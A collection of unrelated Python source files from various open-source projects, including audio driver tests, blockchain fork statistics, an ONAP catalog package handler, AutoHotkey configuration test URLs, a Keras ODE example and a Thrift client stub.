@patch('backend.bcm2835audiodriver.ConfigTxt')
def test__uninstall_disable_audio_failed(self, mock_configtxt, mock_tools):
mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
mock_configtxt.return_value.disable_audio.return_value = False
self.init_session()
with self.assertRaises(Exception) as cm:
self.driver._uninstall()
self.assertEqual(str(cm.exception), 'Error disabling raspberry pi audio')
@patch('backend.bcm2835audiodriver.Tools')
def test__uninstall_with_no_audio_supported(self, mock_tools):
mock_tools.raspberry_pi_infos.return_value = { 'audio': False }
self.init_session()
with self.assertRaises(Exception) as cm:
self.driver._uninstall()
self.assertEqual(str(cm.exception), 'Raspberry pi has no onboard audio device')
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test_enable(self, mock_asound):
self.init_session()
mock_alsa = MagicMock()
self.driver.alsa = mock_alsa
self.driver.get_cardid_deviceid = Mock(return_value=(0, 0))
self.driver.get_control_numid = Mock(return_value=1)
self.assertTrue(self.driver.enable())
self.assertTrue(mock_asound.return_value.delete.called)
self.assertTrue(mock_asound.return_value.save_default_file.called)
self.assertTrue(mock_alsa.amixer_control.called)
self.assertTrue(mock_alsa.save.called)
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
@patch('backend.bcm2835audiodriver.Alsa')
def test_enable_no_card_infos(self, mock_alsa, mock_asound):
self.init_session()
self.driver.get_cardid_deviceid = Mock(return_value=(None, None))
self.assertFalse(self.driver.enable())
self.assertTrue(mock_asound.return_value.delete.called)
self.assertFalse(mock_asound.return_value.save_default_file.called)
self.assertFalse(mock_alsa.return_value.amixer_control.called)
self.assertFalse(mock_alsa.return_value.save.called)
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
@patch('backend.bcm2835audiodriver.Alsa')
def test_enable_alsa_save_default_file_failed(self, mock_alsa, mock_asound):
mock_asound.return_value.save_default_file.return_value = False
self.init_session()
self.driver.get_cardid_deviceid = Mock(return_value=(0, 0))
self.assertFalse(self.driver.enable())
self.assertTrue(mock_asound.return_value.delete.called)
self.assertTrue(mock_asound.return_value.save_default_file.called)
self.assertFalse(mock_alsa.return_value.amixer_control.called)
self.assertFalse(mock_alsa.return_value.save.called)
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test_enable_alsa_amixer_control_failed(self, mock_asound):
self.init_session()
mock_alsa = MagicMock()
mock_alsa.amixer_control.return_value = False
self.driver.alsa = mock_alsa
self.driver.get_cardid_deviceid = Mock(return_value=(0, 0))
self.driver.get_control_numid = Mock(return_value=1)
self.assertFalse(self.driver.enable())
self.assertTrue(mock_asound.return_value.delete.called)
self.assertTrue(mock_asound.return_value.save_default_file.called)
self.assertTrue(mock_alsa.amixer_control.called)
self.assertFalse(mock_alsa.save.called)
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test_disable(self, mock_asound):
self.init_session()
self.assertTrue(self.driver.disable())
self.assertTrue(mock_asound.return_value.delete.called)
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test_disable_asound_delete_failed(self, mock_asound):
mock_asound.return_value.delete.return_value = False
self.init_session()
self.assertFalse(self.driver.disable())
self.assertTrue(mock_asound.return_value.delete.called)
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test_is_enabled(self, mock_asound):
self.init_session()
self.driver.is_card_enabled = Mock(return_value=True)
mock_asound.return_value.exists.return_value = True
self.assertTrue(self.driver.is_enabled())
self.driver.is_card_enabled = Mock(return_value=False)
mock_asound.return_value.exists.return_value = True
self.assertFalse(self.driver.is_enabled())
self.driver.is_card_enabled = Mock(return_value=True)
mock_asound.return_value.exists.return_value = False
self.assertFalse(self.driver.is_enabled())
def test__set_volumes_controls(self):
self.init_session()
self.driver.alsa = Mock()
self.driver.alsa.get_simple_controls.return_value = ['PCM']
self.driver.get_control_numid = Mock(return_value=3)
self.driver._set_volumes_controls()
self.assertEqual(self.driver.volume_control, 'PCM')
self.assertEqual(self.driver.volume_control_numid, 3)
def test_get_volumes(self):
self.init_session()
mock_alsa = Mock()
mock_alsa.get_volume.return_value = 66
self.driver.alsa = mock_alsa
vols = self.driver.get_volumes()
self.assertEqual(vols, { 'playback': 66, 'capture': None })
def test_set_volumes(self):
self.init_session()
mock_alsa = Mock()
mock_alsa.set_volume.return_value = 99
self.driver.alsa = mock_alsa
vols = self.driver.set_volumes(playback=12, capture=34)
self.assertEqual(vols, { 'playback': 99, 'capture': None })
def test_require_reboot(self):
self.init_session()
self.assertFalse(self.driver.require_reboot())
if __name__ == "__main__":
# coverage run --omit="*lib/python*/*","test_*" --concurrency=thread test_audio.py; coverage report -m -i
unittest.main()
| StarcoderdataPython |
4923248 | <reponame>andreaskern/simcoin
import logging
from bitcoin.rpc import JSONRPCError
from setuptools.package_index import unique_everseen
import utils
import config
from operator import attrgetter
class CliStats:
def __init__(self, context, writer):
self._context = context
self._writer = writer
def execute(self):
height = self._context.first_block_height
nodes = self._context.nodes.values()
if(height == None):
height = 0
_persist_consensus_chain(self._calc_consensus_chain(height, nodes))
self._persist_node_stats()
self._collect_forks_form_getchaintips() # TODO fix headers
logging.info('Executed cli stats')
def _calc_consensus_chain(self, height, nodes):
consensus_chain = []
logging.info('Calculating consensus chain starting with height={}'.format(height))
while True:
block_hashes = {}
failing_nodes = []
block_hash = None
for node in nodes:
try:
block_hash = node.execute_rpc('getblockhash', height)
if block_hash in block_hashes:
block_hashes[block_hash].append(node.name)
else:
block_hashes[block_hash] = [node.name]
except JSONRPCError:
failing_nodes.append(node.name)
if len(failing_nodes) > 0:
logging.info('Stopped calculating consensus chain on height={} because nodes={}'
' have no block on this height'.format(height, failing_nodes))
break
elif len(block_hashes) > 1:
logging.info('Stopped calculating consensus chain on height={} because'
' nodes have different blocks ({})'.format(height, block_hashes))
break
else:
consensus_chain.append(block_hash)
height += 1
logging.info('Added block with hash={} to consensus chain'.format(block_hash))
logging.info('Calculated {} block long consensus chain from {} nodes and until height={}'
.format(len(consensus_chain), len(nodes), height - 1))
return consensus_chain
def _persist_node_stats(self): # forks calculated here
tips = []
for node in self._context.nodes.values():
tips.extend(
[
Tip.from_dict(
node.name,
chain_tip
)
for chain_tip
in node.execute_rpc('getchaintips')
]
)
self._writer.write_csv(
Tip.file_name,
Tip.csv_header,
tips
)
logging.info('Collected and persisted {} tips'.format(len(tips)))
def _collect_forks_form_getchaintips(self):
self.__collect_forks_form_getchaintips(
self._context.nodes.values(),
self._writer
)
@staticmethod
def __collect_forks_form_getchaintips(node_values, writer):
logging.info('Collecting forks.csv from getchaintips')
tips = []
for node in node_values:
tips.extend(
[
Tip.from_dict(
node.name,
chain_tip
)
for chain_tip
in node.execute_rpc('getchaintips')
]
)
'''
Possible values for status:
1. "invalid" branch contains invalid blocks
2. "headers-only" Not all blocks for this branch are available, but the headers are valid
3. "valid-headers" All blocks are available for this branch, but they were never fully validated
4. "valid-fork" This branch is not part of the active chain, but is fully validated
5. "active" This is the tip of the active main chain, which is certainly valid
fork life cycle
headers-only -> valid.headers -> {invalid, valid-fork -> active -> [REC:valid-fork]}
'''
forks = []
'''select height, status '''
for tip in tips:
forks.extend([
tip._height,
tip._status
])
'''filter status != valid-fork'''
forks = [tip for tip in tips if tip.is_valid_fork()]
'''aggregate by hash # fold status '''
forks = unique_everseen(forks, key=attrgetter('_hash'))
'''sort by tag, height'''
forks = sorted(forks, key=attrgetter('_height'))
# sorted(forks, key=attrgetter('_tag')) # tag is added later
writer.write_csv(
"forks.csv",
['node','status','length','height', 'tag'],
forks
)
def _persist_consensus_chain(chain):
with open(config.consensus_chain_csv, 'w') as file:
file.write('hash\n')
file.writelines('\n'.join(chain))
file.write('\n')
class Tip:
__slots__ = ['_node', '_status', '_branchlen', '_height', '_hash']
csv_header = ['node', 'status', 'branchlen', 'height', 'hash']
file_name = 'tips.csv'
def __init__(self, node, status, branchlen, height, hash):
self._node = node
self._status = status
self._branchlen = branchlen
self._height = height
self._hash = hash
def is_valid_fork(self) -> bool:
return self._status == 'valid-fork'
@classmethod
def from_dict(cls, node, chain_tip):
return cls(
node,
chain_tip['status'],
chain_tip['branchlen'],
chain_tip['height'],
chain_tip['hash']
)
def vars_to_array(self):
return [
self._node,
self._status,
self._branchlen,
self._height,
self._hash
]
| StarcoderdataPython |
1780564 | from yolov5.utils.plots import plot_results
plot_results('runs\\train\\exp175\\results.csv') # plot 'results.csv' as 'results.png' | StarcoderdataPython |
8115048 | <reponame>rw-meta/starter-py-client
# coding=utf-8
import json
import logging
from time import sleep
import requests
class PrivateApi:
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
def __init__(self, api_url):
self.api_url = api_url
self.max_retries = 30
def submit(self, task):
"""
:type task: Task
"""
if self.api_url == 'http://STUB_URL':
logging.info(u'STARTER CLIENT DEV MODE Задача условно поставлена')
return
url = self.api_url + '/services/' + task.serviceId + '/tasks'
last_e = None
for idx in range(self.max_retries):
try:
resp = requests.post(
url=url,
data=json.dumps(task.__dict__),
headers=self.headers,
timeout=15
)
try:
return json.loads(resp.text)
except:
raise IOError("Starter response read error: " + resp.text)
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as e:
# При ошибках подключения пытаемся еще раз
last_e = e
sleep(3)
raise last_e
| StarcoderdataPython |
5025676 | # Copyright 2017 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import traceback
from catalog.packages.biz.ns_descriptor import NsDescriptor
from catalog.pub.config.config import CATALOG_ROOT_PATH, CATALOG_URL_PATH
from catalog.pub.config.config import REG_TO_MSB_REG_PARAM
from catalog.pub.database.models import NSPackageModel, VnfPackageModel
from catalog.pub.exceptions import CatalogException
from catalog.pub.msapi import sdc
from catalog.pub.utils import fileutil
from catalog.pub.utils import toscaparser
logger = logging.getLogger(__name__)
STATUS_SUCCESS, STATUS_FAILED = "success", "failed"
METADATA = "metadata"
def fmt_ns_pkg_rsp(status, desc, error_code="500"):
return [0, {"status": status, "statusDescription": desc, "errorCode": error_code}]
def ns_on_distribute(csar_id):
"""
Get NS pckage from SDC
:param csar_id:
:return:
"""
ret = None
try:
ret = NsPackage().on_distribute(csar_id)
except CatalogException as e:
NsPackage().delete_csar(csar_id)
return fmt_ns_pkg_rsp(STATUS_FAILED, e.args[0])
except:
logger.error(traceback.format_exc())
NsPackage().delete_csar(csar_id)
return fmt_ns_pkg_rsp(STATUS_FAILED, str(sys.exc_info()))
if ret[0]:
return fmt_ns_pkg_rsp(STATUS_FAILED, ret[1])
return fmt_ns_pkg_rsp(STATUS_SUCCESS, ret[1], "")
def ns_delete_csar(csar_id):
"""
Delete NS package
:param csar_id:
:return:
"""
ret = None
try:
ret = NsPackage().delete_csar(csar_id)
except CatalogException as e:
return fmt_ns_pkg_rsp(STATUS_FAILED, e.args[0])
except:
logger.error(traceback.format_exc())
return fmt_ns_pkg_rsp(STATUS_FAILED, str(sys.exc_info()))
return fmt_ns_pkg_rsp(STATUS_SUCCESS, ret[1], "")
def ns_get_csars():
"""
Get NS packages
:return:
"""
ret = None
try:
ret = NsPackage().get_csars()
except CatalogException as e:
return [1, e.args[0]]
except:
logger.error(traceback.format_exc())
return [1, str(sys.exc_info())]
return ret
def ns_get_csar(csar_id):
"""
Get NS package by id
:param csar_id:
:return:
"""
ret = None
try:
ret = NsPackage().get_csar(csar_id)
except CatalogException as e:
return [1, e.args[0]]
except Exception as e:
logger.error(e.args[0])
logger.error(traceback.format_exc())
return [1, str(sys.exc_info())]
return ret
def parse_nsd(csar_id, inputs):
"""
Parse NSD
:param csar_id:
:param inputs:
:return:
"""
ret = None
try:
ns_pkg = NSPackageModel.objects.filter(nsPackageId=csar_id)
if not ns_pkg:
raise CatalogException("NS CSAR(%s) does not exist." % csar_id)
csar_path = ns_pkg[0].localFilePath
ret = {"model": toscaparser.parse_nsd(csar_path, inputs)}
except CatalogException as e:
return [1, e.args[0]]
except Exception as e:
logger.error(e.args[0])
logger.error(traceback.format_exc())
return [1, str(sys.exc_info())]
return [0, ret]
class NsPackage(object):
"""
Actions for sdc ns package.
"""
def __init__(self):
pass
def on_distribute(self, csar_id):
"""
Fetch NS package csar from SDC
:param csar_id:
:return:
"""
if NSPackageModel.objects.filter(nsPackageId=csar_id):
return [1, "NS CSAR(%s) already exists." % csar_id]
ns = sdc.get_asset(sdc.ASSETTYPE_SERVICES, csar_id)
# check if the related resources exist
resources = ns.get('resources', None)
if resources:
for resource in resources:
if resource['resoucreType'].upper == 'VF' and not VnfPackageModel.objects.filter(
vnfPackageId=resource['resourceUUID']):
logger.error("VF [%s] is not distributed.", resource['resourceUUID'])
raise CatalogException("VF (%s) is not distributed." % resource['resourceUUID'])
# if resource['resoucreType'] == 'PNF' and not PnfPackageModel.objects.filter(
# pnfPackageId=resource['resourceUUID']):
# logger.error("PNF [%s] is not distributed.", resource['resourceUUID'])
# raise CatalogException("PNF (%s) is not distributed." % resource['resourceUUID'])
# download csar package
local_path = os.path.join(CATALOG_ROOT_PATH, csar_id)
csar_name = "%s.csar" % ns.get("name", csar_id)
local_file_name = sdc.download_artifacts(ns["toscaModelURL"], local_path, csar_name)
if local_file_name.endswith(".csar") or local_file_name.endswith(".zip"):
artifact_vnf_file = fileutil.unzip_file(local_file_name, local_path, "Artifacts/Deployment/OTHER/ns.csar")
if os.path.exists(artifact_vnf_file):
local_file_name = artifact_vnf_file
data = {
'userDefinedData': {}
}
nsd = NsDescriptor()
nsd.create(data, csar_id)
nsd.parse_nsd_and_save(csar_id, local_file_name)
return [0, "CSAR(%s) distributed successfully." % csar_id]
def delete_csar(self, csar_id):
"""
Delete NS package by id
:param csar_id:
:return:
"""
nsd = NsDescriptor()
nsd.delete_single(csar_id)
return [0, "Delete CSAR(%s) successfully." % csar_id]
def get_csars(self):
"""
Get ns packages
:return:
"""
csars = []
nss = NSPackageModel.objects.filter()
for ns in nss:
ret = self.get_csar(ns.nsPackageId)
csars.append(ret[1])
return [0, csars]
def get_csar(self, csar_id):
"""
Get NS package by id
:param csar_id:
:return:
"""
package_info = {}
csars = NSPackageModel.objects.filter(nsPackageId=csar_id)
if csars:
package_info["nsdId"] = csars[0].nsdId
package_info["nsPackageId"] = csars[0].nsPackageId
package_info["nsdProvider"] = csars[0].nsdDesginer
package_info["nsdVersion"] = csars[0].nsdVersion
package_info["csarName"] = csars[0].nsPackageUri
package_info["nsdModel"] = csars[0].nsdModel
package_info["nsdInvariantId"] = csars[0].invariantId
package_info["downloadUrl"] = "http://%s:%s/%s/%s/%s" % (
REG_TO_MSB_REG_PARAM[0]["nodes"][0]["ip"],
REG_TO_MSB_REG_PARAM[0]["nodes"][0]["port"],
CATALOG_URL_PATH,
csar_id,
csars[0].nsPackageUri)
else:
raise CatalogException("Ns package[%s] not Found." % csar_id)
return [0, {"csarId": csar_id, "packageInfo": package_info}]
| StarcoderdataPython |
153389 | #!/usr/bin/python
# Python built-in function range() generates the integer numbers between the given start integer to the stop integer, i.e., range() returns a range object.
# Using for loop, we can iterate over a sequence of numbers produced by the range() function.
# It only allows integer type numbers as arguments.
# We can’t provide a string or float type parameter inside the range() function.
# The arguments can either be +ve or -ve.
# It doesn’t accept ‘0’ as a step value. If the step is ‘0’, the function throws a ValueError.
for step in range(10, 100, 10):
print(step)
print("\nAnother Example to loop over a list using range")
port_lists = [21, 22, 23, 25, 53, 80, 443, 3306, 8080, 9002, 27017]
for port in range(len(port_lists)):
print(port_lists[port])
| StarcoderdataPython |
12820113 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: x.huang
# @date:17-8-11
from abc import abstractmethod
from libs.util import AbstractBase
class BaseService(AbstractBase):
@abstractmethod
def insert(self, *args, **kwargs):
pass
@abstractmethod
def update(self, *args, **kwargs):
pass
@abstractmethod
def delete(self, *args, **kwargs):
pass
def get_by_pk(self, pk):
pass
def get_all(self, *args, **kwargs):
pass
def get(self, *args, **kwargs):
pass
| StarcoderdataPython |
11313960 | <gh_stars>10-100
basic_url = "/?length=1&comment0=test+comment&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skeyValue0=i&Window0=ahk_exe+chrome.exe&Program0=chrome.exe&option0=ActivateOrOpen"
basic_hotstring_url = (
"/?indexes=0&comment0=&func0=STRING&skeyValue0=btw&input0=by+the+way&option0=Replace"
)
public_examples = [
"/?length=2&comment0=CTRL+++ALT+++M+%3D+main.vi+%28if+open%29&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skeyValue0=m&Code0=%0D%0A+++if+WinExist%28%22Robot+Main.vi%22%29%0D%0A+++%7B%0D%0A++++++WinActivate%3B+Uses+the+last+found+window.%0D%0A+++%7D%0D%0A+++return&option0=Custom&comment1=CTRL+++ALT+++D+%3D+Driver+Station&func1=KEY&skey1%5B%5D=CTRL&skey1%5B%5D=ALT&skeyValue1=d&Window1=ahk_exe+DriverStation.exe&Program1=C%3A%5CProgram+Files+%28x86%29%5CFRC+Driver+Station%5CDriverstation.exe&option1=ActivateOrOpen",
"/?length=1&comment0=%3B+CTRL+%2B+Shift+%2B+c+%3D+copy+to+next+window&func0=KEY&skeyValue0=%24%5E%2Bc&Code0=%0D%0A++++Loop%2C+1+%3B+increase+this+to+repeat+multiple+times%0D%0A++++%7B%0D%0A++++++Send%2C+%5Ec%0D%0A++++++Sleep%2C+300+%3B+let+Windows+do+its+thing%0D%0A++++++%3B+Because+Excel+copies+cells+with+an+endline%2C+trim+the+clipboard%0D%0A++++++clipboard+%3A%3D+Trim%28clipboard%2C+OmitChars+%3A%3D+%22+%60n%60r%60t%22%29%0D%0A++++++Send%2C+%21%7BTab%7D%0D%0A++++++Sleep%2C+300+%3B+let+Windows+catch+up%0D%0A++++++Send%2C+%5Ea%0D%0A++++++Send%2C+%5Ev%0D%0A++++++Sleep%2C+300+%3B+let+Windows+do+its+thing%0D%0A++++++Send%2C+%7BReturn%7D%0D%0A++++++Send%2C+%21%7BTab%7D%0D%0A++++++Sleep%2C+30+%3B+let+Windows+do+its+thing%0D%0A++++++Send%2C+%7BReturn%7D+%3B+Excel+wants+to+have+it+clearly+indicated+that+the+copy+command+is+finished%0D%0A++++++Send%2C+%7BDown%7D%0D%0A++++%7D%0D%0A++++return&option0=Custom",
"/?length=1&comment0=&func0=KEY&skeyValue0=F3&Code0=%0D%0A+next+%3D+GetNextProgram%28%29%0D%0A+get_exe_name+%3D++GetExe%28next%29%3B%0D%0A+MsgBox%2C+Next+Program%3A+%25next%25%60nExe%3A+%25get_exe_name%25%0D%0A+ActivateOrOpen%28next%2C+get_exe_name%29%3B%0D%0A+return%0D%0A%0D%0AGetNextProgram%28%29+%7B%0D%0A+if+WinActive%28%22ahk_class+excel.exe%22%29+%7B+return+%22ahk_exe+outloo.exe%22%7D%0D%0A+if+WinActive%28%22ahk_exe+sage%22%29+%7Breturn+%22ahk_class+MozillaWindowClass%22%7D%0D%0A%7D%0D%0A%0D%0AGetExe%28program%29+%7B%0D%0A+if+%28program+%3D+%22ahk_exe+excel.exe%22%29+%7B+return+%22excel.exe%22%7D%0D%0A+if+%28porgram+%3D+%22ahk_exe+outlook.exe%22%29+%7Breturn+%22outlook.exe%22%7D%0D%0A+if+%28program+%3D+%22ahk_class+MozillaWindowClass%22%29+%7B+return+%22Mozilla.exe%22%7D%3B%0D%0A%7D%0D%0A%0D%0A+%0D%0A+&option0=Custom",
"/?length=1&comment0=&func0=KEY&skeyValue0=LButton&input0=12345rt&option0=Send",
"/?length=1&comment0=&func0=KEY&skeyValue0=SC002&Code0=%0D%0A+++++Loop%2C+%3B+loop+forever%0D%0A+++++++++Send%2C+d%0D%0A+++++++++Sleep%2C+7000+%3B+7%2C000+ms+%3D+7+s%0D%0A+++++++++MouseMove%2C+0%2C70%2C%2CR+%3B+move+the+mouse+70+pixels+relative+to+current+position%0D%0A+++++++++Click%0D%0A+++++++++Send%2C+d%0D%0A+++++++++MouseMove%2C+0%2C-70%2C%2CR+%3B+move+the+mouse+70+pixels+relative+to+current+position&option0=Custom",
"/?length=1&comment0=&func0=KEY&skey0[]=ALT&skeyValue0=F12&input0=%E2%98%BA%E2%99%A5%E2%98%BA&option0=Send",
"/?length=6&comment0=&func0=KEY&skeyValue0=1&input0=%E2%9A%80&option0=Replace&comment1=&func1=KEY&skeyValue1=2&input1=%E2%9A%81&option1=Replace&comment2=&func2=KEY&skeyValue2=3&input2=%E2%9A%82&option2=Replace&comment3=&func3=KEY&skeyValue3=4&input3=%E2%9A%83&option3=Replace&comment4=&func4=KEY&skeyValue4=5&input4=%E2%9A%84&option4=Replace&comment5=&func5=KEY&skeyValue5=6&input5=%E2%9A%85&option5=Replace",
"/?length=1&comment0=focus+gimp&func0=KEY&skey0[]=CTRL&skey0[]=ALT&skeyValue0=g&Window0=ahk_exe+gimp.exe&Program0=gimp.exe&option0=ActivateOrOpen",
"/?length=2&comment0=&func0=KEY&skeyValue0=LButton&input0=k&option0=Send&comment1=&func1=KEY&skeyValue1=RButton&input1=l&option1=Send",
"/?length=1&comment0=&func0=KEY&skey0[]=ALT&skeyValue0=F12&input0=gds&option0=Send",
"/?length=1&comment0=&func0=KEY&skey0[]=CTRL&skey0[]=ALT&skeyValue0=t&Window0=Windows+Terminal&Program0=wt&option0=ActivateOrOpen",
"/?length=1&comment0=&func0=KEY&skey0[]=CTRL&skey0[]=SHIFT&skeyValue0=q&input0=testing!&option0=Send",
"/?length=1&comment0=&func0=KEY&skeyValue0=MButton&Code0=Send+{PgDn}&option0=Custom",
"/?length=1&comment0=&func0=STRING&skeyValue0=+fs&input0=^s&option0=Send",
"/?length=1&comment0=&func0=STRING&skeyValue0=afaik&input0=As+far+as+I+Know&option0=Send",
"/?length=1&comment0=CTRL+++ALT+++M+=+calendar&func0=KEY&skey0[]=CTRL&skey0[]=ALT&skey0[]=WIN&skeyValue0=q&Window0=Red+Hat+-+Calendar&Program0=https://calendar.google.com/calendar/r/week&option0=ActivateOrOpenChrome",
"/?length=1&comment0=CTRL+ALT+WIN+W%3DGmail&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skey0%5B%5D=WIN&skeyValue0=w&Window0=Inbox&Program0=https%3A%2F%2Fmail.google.com%2Fmail%2Fu%2F0%2F%23inbox&option0=ActivateOrOpenChrome#inbox&option2=ActivateOrOpenChrome",
]
basic_test_cases = {
"base": "/",
"btw__by_the_way": "/?length=1&comment0=&func0=STRING&skeyValue0=btw&input0=by+the+way&option0=Replace",
"btw__by_the_way_commented": "/?length=1&comment0=btw+%3D+by+the+way&func0=STRING&skeyValue0=btw&input0=by+the+way&option0=Replace",
"ctrl_alt_i__chrome": "/?length=1&comment0=&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skeyValue0=i&Window0=ahk_exe+chrome.exe&Program0=chrome.exe&option0=ActivateOrOpen",
"implies__send_unicode_char": "/?length=1&comment1=%22%3Bimplies%22+is+replaced+with+an+arrow&func1=STRING&skeyValue1=%3Bimplies&input1=0x2192&option1=SendUnicodeChar",
"config__open_config": "/?length=1&comment0=%3Bconfig+%3D+open+this+page&func0=STRING&skeyValue0=%60%3Bconfig&option0=OpenConfig",
"LButton__send_input": "/?length=1&comment0=&func0=KEY&skeyValue0=LButton&input0=b&option0=Send",
"pandora__activate_or_open_chrome__pandora_com": "/?length=1&comment0=&func0=STRING&skeyValue0=%60%3Bpandora&Window0=pandora&Program0=http%3A%2F%2Fwww.pandora.com&option0=ActivateOrOpenChrome",
"ctrl_shift_g__custom_code__google_selected_text": "/?length=1&comment17=CTRL+%2B+Shift+%2B+g+%3D+search+Google+for+the+highlighted+text&func17=KEY&skey17%5B%5D=CTRL&skey17%5B%5D=SHIFT&skeyValue17=g&Code17=%0D%0ASend%2C+%5Ec%0D%0ASleep+50%0D%0ARun%2C+http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D%25clipboard%25%0D%0AReturn&option17=Custom",
}
def _bad_urls():
leading_parts = [["length=1",], ["indexes={index}"]]
possible_triggers = [
["func{index}=KEY", "skeyValue{index}=d",],
["func{index}=KEY", "skeyValue{index}=g",],
["func{index}=STRING", "skeyValue{index}=btw",],
]
possible_actions = [
["input{index}=by+the+way", "option{index}=Replace",],
[
"Window{index}=ahk_exe+chrome.exe",
"Program{index}=chrome.exe",
"option{index}=ActivateOrOpen",
],
["input{index}=0x2192", "option{index}=SendUnicodeChar",],
["option{index}=OpenConfig",],
["input{index}=b", "option{index}=Send",],
[
"Window{index}=pandora",
"Program{index}=http%3A%2F%2Fwww.pandora.com",
"option{index}=ActivateOrOpenChrome",
],
[
"Code{index}=%0D%0ASend%2C+%5Ec%0D%0ASleep+50%0D%0ARun%2C+http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D%25clipboard%25%0D%0AReturn",
"option{index}=Custom",
],
]
# missing length
for trigger in possible_triggers:
yield "&".join(trigger + possible_actions[0]).format(index=1)
for leading_part in leading_parts:
for trigger in possible_triggers:
for part in trigger:
other_parts = [t for t in trigger if t != part]
yield "&".join(leading_part + other_parts + possible_actions[0]).format(index=1)
bad_urls = list(["?" + url for url in _bad_urls()])
| StarcoderdataPython |
4800403 | <gh_stars>1-10
import dash_bootstrap_components as dbc
import dash_html_components as html
from components.home_project_block import project_block
from db import session
from models import Project
def layout(*args, **kwargs):
projects = session.query(Project).order_by(Project.name).all()
return html.Div([
dbc.Jumbotron(html.Img(src="assets/logo_2tone.svg"), className="d-flex justify-content-center"),
html.H1("Genomics of Drug Sensitivity in Cancer", className='display-4 text-center'),
html.P("Drug Combination Matrix Explorer", className="lead text-center"),
html.P("An interactive tool for the interpretation of bitherapy data generated at the Wellcome Sanger Institute.", className='text-center post-lead'),
dbc.Row(className='mt-5', children=[dbc.Col(width=12, children=html.H3("Screening Projects", className='mt-5 mb-3'))] +
[project_block(p) for p in projects])
])
| StarcoderdataPython |
5187404 | <gh_stars>1-10
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.layers import Dense
from matplotlib import pyplot as plt
class Module(keras.Model):
def __init__(self, nf):
super(Module, self).__init__()
self.dense_1 = Dense(nf, activation='tanh')
self.dense_2 = Dense(nf, activation='tanh')
def call(self, inputs, **kwargs):
t, x = inputs
h = self.dense_1(x)
return self.dense_2(h) - 0.25*x
def odeint(func, y0, t, solver):
dts = t[1:] - t[:-1]
tk = t[0]
yk = y0
hist = [(tk, y0)]
for dt in dts:
print(tk, end="\r")
yk = solver(dt, tk, yk, func)
tk = tk + dt
hist.append((tk, yk))
# sys.stdout.write('\033[2K\033[1G')
return hist
def midpoint_step_keras(dt, tk, hk, fun):
k1 = fun([tk, hk])
k2 = fun([tk + dt, hk + dt*k1])
return hk + dt * (k1 + k2)/2
# def figure_attention(attention):
# fig, ax = tfp.subplots(figsize=(4, 3))
# im = ax.imshow(attention, cmap='jet')
# fig.colorbar(im)
# return fig
if __name__ == '__main__':
tf.enable_eager_execution()
t_grid = np.linspace(0, 500., 2000)
h0 = tf.to_float([[1., -1.]])
model = Module(2)
hist = odeint(model, h0, t_grid, midpoint_step_keras)
results = []
for h in hist:
with tf.Session() as sess:
result = h[1].numpy()
results.append(result[0])
# plot_op = tfp.plot(figure_attention, [hist])
# execute_op_as_image(plot_op)
results = np.array(results)
plt.plot(results.T[0, :])
plt.plot(results.T[1, :])
plt.show()
exit(0) | StarcoderdataPython |
9689793 | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from cyclozzo.thrift.Thrift import *
from ttypes import *
from cyclozzo.thrift.Thrift import TProcessor
from cyclozzo.thrift.transport import TTransport
from cyclozzo.thrift.protocol import TBinaryProtocol, TProtocol
try:
from cyclozzo.thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
"""
The client service mimics the C++ client API, with table, scanner and
mutator interface flattened.
"""
def create_namespace(self, ns):
"""
Create a namespace
@param ns - namespace name
Parameters:
- ns
"""
pass
def create_table(self, ns, table_name, schema):
"""
Create a table
@param ns - namespace id
@param table_name - table name
@param schema - schema of the table (in xml)
Parameters:
- ns
- table_name
- schema
"""
pass
def open_namespace(self, ns):
"""
Open a namespace
@param ns - namespace
@return value is guaranteed to be non-zero and unique
Parameters:
- ns
"""
pass
def close_namespace(self, ns):
"""
Close a namespace
@param ns - namespace
Parameters:
- ns
"""
pass
def open_scanner(self, ns, table_name, scan_spec, retry_table_not_found):
"""
Open a table scanner
@param ns - namespace id
@param table_name - table name
@param scan_spec - scan specification
@param retry_table_not_found - whether to retry upon errors caused by
drop/create tables with the same name
Parameters:
- ns
- table_name
- scan_spec
- retry_table_not_found
"""
pass
def close_scanner(self, scanner):
"""
Close a table scanner
@param scanner - scanner id to close
Parameters:
- scanner
"""
pass
def next_cells(self, scanner):
"""
Iterate over cells of a scanner
@param scanner - scanner id
Parameters:
- scanner
"""
pass
def next_cells_as_arrays(self, scanner):
"""
Parameters:
- scanner
"""
pass
def next_cells_serialized(self, scanner):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- scanner
"""
pass
def next_row(self, scanner):
"""
Iterate over rows of a scanner
@param scanner - scanner id
Parameters:
- scanner
"""
pass
def next_row_as_arrays(self, scanner):
"""
Alternative interface using array as cell
Parameters:
- scanner
"""
pass
def next_row_serialized(self, scanner):
"""
Alternate interface returning a buffer of serialized cells for iterating by row
for a given scanner
@param scanner - scanner id
Parameters:
- scanner
"""
pass
def get_row(self, ns, table_name, row):
"""
Get a row (convenience method for random access a row)
@param ns - namespace id
